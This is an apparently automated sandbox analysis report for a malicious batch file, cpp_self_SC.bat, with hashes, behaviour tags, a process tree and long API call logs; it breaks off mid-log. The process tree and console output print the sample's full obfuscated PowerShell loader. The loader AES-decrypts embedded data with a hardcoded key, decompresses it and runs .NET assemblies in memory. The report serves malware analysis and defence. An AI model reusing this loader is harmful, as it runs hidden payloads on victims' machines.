Summary | ZeroBOX

cpp_self_SC.bat

NPKI Generic Malware Downloader Antivirus FTP DGA HTTP Socket Escalate priviledges Create Service KeyLogger Code injection P2P Internet API DNS Http API Steal credential ScreenShot Sniff Audio AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6403_us April 12, 2023, 1:26 p.m. April 12, 2023, 1:28 p.m.
Size 377.9KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 7b99fd1109a4f8307320a92fbb237bfb
SHA256 c403661d97b505eb900a16ab16ef8ff7ef1b6c3afc71c463c2469fa0cc03c1a2
CRC32 D90D8803
ssdeep 6144:zBRZTe1Dqjw9lCjnvCC1H42WDB/QyRqKISiYPPkWB+xjlubIJXJxLt0pBp2BC18K:zJTe1yw9lCTv14vCy5p7PkU+xjQw5xL6
Yara
  • NPKI_Zero - File included NPKI

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MJTdZEt" C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat

    1492
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat

      2056
      • cpp_self_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD 
([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);

        2280

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:1 char:970
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJ
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: P'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJ
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: PtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmA
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: SJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteA
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: SJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '')
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ;$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wij
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: w='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPes
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Crypto
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: graphy.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CB
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: C;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: System.Convert]::$xFRM( <<<< 'ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$N
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: jyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: ();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose(
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: );$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utr
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: tk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compre
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: ssion.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.Co
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: pyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray(
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: );}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Pa
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: th]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVF
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: j=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: ])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Asse
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: mbly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assemb
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: ly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: ecordException
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000017f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c9a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0043c9a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005ef1f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eef30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eef30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eef30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02861000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02862000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
